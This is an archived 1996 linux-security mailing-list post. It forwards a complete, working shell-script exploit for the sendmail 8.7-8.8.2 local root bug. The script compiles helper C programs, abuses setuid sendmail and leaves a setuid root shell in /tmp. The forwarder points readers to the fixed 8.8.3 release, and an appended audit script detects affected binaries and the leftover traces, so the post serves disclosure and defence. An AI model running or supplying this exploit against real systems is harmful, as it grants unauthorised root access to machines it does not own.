[linux-security] Sendmail 8.8.2 exploit. (fwd)

pxs/420 (shepard@squishy.ameth.org)
Sun, 17 Nov 1996 20:06:05 -0600 (CST)


Sorry if this has been sent to this list already.. if it hasn't, happy
upgrading..

sendmail.8.8.3 is at ftp.cs.berkeley.edu in /pub/sendmail.

ameth

| shepard@ameth.org |
= http://www.ameth.org =
| Administrator, Ameth Technologies |

---------- Forwarded message ----------
Date: Sun, 17 Nov 1996 02:36:33 +0100 (MET)
From: Dawnshadow <sdx@linnea.asogy.stockholm.se>
Reply-To: linux-security@redhat.com
To: linux-security@redhat.com
Subject: [linux-security] Sendmail 8.8.2 exploit.
Resent-Date: Sun, 17 Nov 1996 18:28:02 -0500
Resent-From: linux-security@redhat.com

Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
similar:

#! /bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
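
Added example, not part of the original post or the forwarded script: a defender-side check for the conditions the script depends on and for what it leaves behind (a setuid sendmail in the 8.7-8.8.2 range, a setuid file in /tmp, a process whose argv[0] points into /tmp). The function names are illustrative, and the version string is assumed to be supplied by the caller.

```shell
#!/bin/sh
# Added example (not from the post). Usage:
#   sh check.sh --audit /usr/sbin/sendmail 8.8.2

# Return 0 if version $1 lies in 8.7 .. 8.8.2, the range named in the post.
version_affected() {
    case $1 in ''|*[!0-9.]*) return 2 ;; esac   # reject non-numeric input
    old_ifs=$IFS; IFS=.
    set -- $1                                   # split into major minor patch
    IFS=$old_ifs
    [ "${1:-0}" -eq 8 ] || return 1
    [ "${2:-0}" -eq 7 ] && return 0
    [ "${2:-0}" -eq 8 ] && [ "${3:-0}" -le 2 ]
}

# Print every setuid regular file directly inside directory $1.
# The forwarded script ends by leaving a setuid copy of the shell in /tmp.
setuid_files_in() {
    for f in "$1"/* "$1"/.[!.]*; do
        if [ -f "$f" ] && [ -u "$f" ]; then printf '%s\n' "$f"; fi
    done
}

# Read "PID COMMAND..." lines on stdin and print the PIDs whose argv[0]
# lives under /tmp or /var/tmp (the script starts sendmail as "/tmp/smtpd").
tmp_argv0_pids() {
    awk '$2 ~ /^\/(var\/)?tmp\// { print $1 }'
}

# $1 = path of the sendmail binary, $2 = version that binary reports.
audit() {
    if [ -u "$1" ] && version_affected "$2"; then
        echo "AFFECTED: $1 is setuid and $2 is within 8.7-8.8.2; upgrade to 8.8.3"
    fi
    setuid_files_in /tmp | sed 's|^|setuid file in /tmp: |'
    ps -eo pid,args | tmp_argv0_pids | sed 's|^|process started from a tmp path: pid |'
}

if [ "${1:-}" = "--audit" ]; then
    audit "$2" "$3"
fi
```

A hit from `setuid_files_in` or `tmp_argv0_pids` on a host that ran an affected version is a reason to treat the machine as compromised, not just to delete the file.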